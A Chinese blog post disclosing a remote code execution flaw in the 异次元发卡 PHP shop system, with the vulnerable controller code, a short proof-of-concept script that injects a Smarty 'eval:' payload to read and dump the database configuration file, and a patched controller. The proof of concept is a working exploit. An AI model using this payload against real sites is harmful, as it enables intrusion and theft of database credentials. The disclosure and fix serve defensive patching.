异次元发卡执行任意代码漏洞最新
站长 • 2024-05-14 19:43 • 182 次点击 • 技术文章
漏洞路由
1 https://xxx.com/user/pay/order
2 https://xxx.com/user/recharge/order
涉及文件
app/Controller/User/Pay.php
app/Controller/User/Recharge.php
第一个文件 acg/app/Controller/User/Pay.php
在1.2.9版本更新中已经修复
第二个文件 /app/Controller/User/Recharge.php
<?php
declare(strict_types=1);
namespace App\Controller\User;
use App\Controller\Base\View\User;
use App\Interceptor\UserSession;
use App\Interceptor\Waf;
use App\Model\Config;
use App\Model\UserGroup;
use App\Model\UserRecharge;
use Kernel\Annotation\Interceptor;
use Kernel\Exception\JSONException;
use Kernel\Util\View;
#[Interceptor(Waf::class, Interceptor::TYPE_VIEW)]
class Recharge extends User
{
/**
* @return mixed
* @throws \Kernel\Exception\ViewException
*/
#[Interceptor(UserSession::class)]
public function index(): string
{
$rechargeWelfareConfig = explode(PHP_EOL, (string)Config::get("recharge_welfare_config"));
$welfareConfig = [];
foreach ($rechargeWelfareConfig as $item) {
$ape = explode("-", trim($item));
$welfareConfig[] = [
"recharge" => $ape[0],
"amount" => $ape[1]
];
}
return $this->theme("充值中心", "RECHARGE", "User/Recharge.html", [
"welfareConfig" => $welfareConfig,
'groupNext' => UserGroup::get($this->getUser()->recharge, true),
"groups" => UserGroup::query()->orderBy("recharge", "asc")->get()
]);
}
/**
* @throws \Kernel\Exception\JSONException
* @throws \Kernel\Exception\ViewException
*/
public function order(): string
{
$obj = [];
parse_str(base64_decode(urldecode((string)$_GET['_PARAMETER'][0])), $obj);
//获取订单信息
$order = UserRecharge::query()->where("trade_no", $obj['tradeNo'])->first();
if (!$order) {
return '订单不存在';
}
$type = (int)$obj['type'];
$data = (array)json_decode((string)$order->option, true);
if ($type == 2) {
if (!$data) {
throw new JSONException("参数错误");
}
return $this->render("正在下单,请稍后..", "Submit.html", [
"url" => $order->pay_url,
"data" => $data
]);
}
return View::render($obj['handle'] . '/View/' . $obj['code'] . '.html', ['order' => $order, 'option' => $data], BASE_PATH . '/app/Pay/');
}
}
<?php
declare (strict_types=1);
namespace Kernel\Util;
class View
{
/**
* @param string $template
* @param array $data
* @param string $dir
* @return string
* @throws \SmartyException
*/
public static function render(string $template, array $data = [], string $dir = BASE_PATH . '/app/View'): string
{
$engine = new \Smarty();
$engine->setTemplateDir($dir);
$engine->setCacheDir(BASE_PATH . '/runtime/view/cache');
$engine->setCompileDir(BASE_PATH . '/runtime/view/compile');
$engine->left_delimiter = '#{';
$engine->right_delimiter = '}';
foreach ($data as $key => $item) {
$engine->assign($key, $item);
}
$result = $engine->fetch($template);
hook(\App\Consts\Hook::RENDER_VIEW, $result);
return $result;
}
简易的使用代码
<?php
$tradeNo= 'xxxxx';//先去网站进行充值下单 获取网站订单号
$eval ='eval:#{$database=file_get_contents("config/database.php")}#{var_dump($database)}';
$base64 = urlencode(base64_encode('type=1&tradeNo='.$tradeNo.'&handle='.$eval. '&code=1'));
echo $base64;
//把拿到的编码拼接到路由后
// 'https://xxx.com/user/pay/order.'.$base64 商品订单
// 'https://xxx.com/user/recharge/order.'.$base64 充值订单
输入到浏览器访问即可执行 当然还可以执行其他恶意代码
修复代码
将下放的代码复制到 app/Controller/User/Recharge.php 进行覆盖保存
<?php
declare(strict_types=1);
namespace App\Controller\User;
use App\Controller\Base\View\User;
use App\Interceptor\UserSession;
use App\Interceptor\Waf;
use App\Model\Config;
use App\Model\UserGroup;
use App\Model\UserRecharge;
use Kernel\Annotation\Interceptor;
use Kernel\Exception\JSONException;
use Kernel\Util\View;
#[Interceptor(Waf::class, Interceptor::TYPE_VIEW)]
class Recharge extends User
{
/**
* @return mixed
* @throws \Kernel\Exception\ViewException
*/
#[Interceptor(UserSession::class)]
public function index(): string
{
$rechargeWelfareConfig = explode(PHP_EOL, (string)Config::get("recharge_welfare_config"));
$welfareConfig = [];
foreach ($rechargeWelfareConfig as $item) {
$ape = explode("-", trim($item));
$welfareConfig[] = [
"recharge" => $ape[0],
"amount" => $ape[1]
];
}
return $this->theme("充值中心", "RECHARGE", "User/Recharge.html", [
"welfareConfig" => $welfareConfig,
'groupNext' => UserGroup::get($this->getUser()->recharge, true),
"groups" => UserGroup::query()->orderBy("recharge", "asc")->get()
]);
}
/**
* @throws \Kernel\Exception\JSONException
* @throws \Kernel\Exception\ViewException
*/
public function order(): string
{
$obj = [];
parse_str(base64_decode(urldecode((string)$_GET['_PARAMETER'][0])), $obj);
//获取订单信息
$order = UserRecharge::query()->where("trade_no", $obj['tradeNo'])->first();
if (!$order) {
return '订单不存在';
}
$type = (int)$obj['type'];
$data = (array)json_decode((string)$order->option, true);
if ($type == 2) {
if (!$data) {
throw new JSONException("参数错误");
}
return $this->render("正在下单,请稍后..", "Submit.html", [
"url" => $order->pay_url,
"data" => $data
]);
}
$pay = \App\Model\Pay::query()->find($order->pay_id);
if ((string)$obj['handle'] == $pay->handle && (string)$obj['code'] == $pay->code) {
return View::render($pay->handle.'/View/'.$pay->code.'.html', ['order' => $order, 'option' => $data], BASE_PATH . '/app/Pay/');
}
header('content-type:application/json;charset=utf-8');
exit(json_encode(['code '=>403,'msg'=>'N M S L','data'=>'W S N D']));
}
}
推荐阅读:
扫描二维码,在手机上阅读
收藏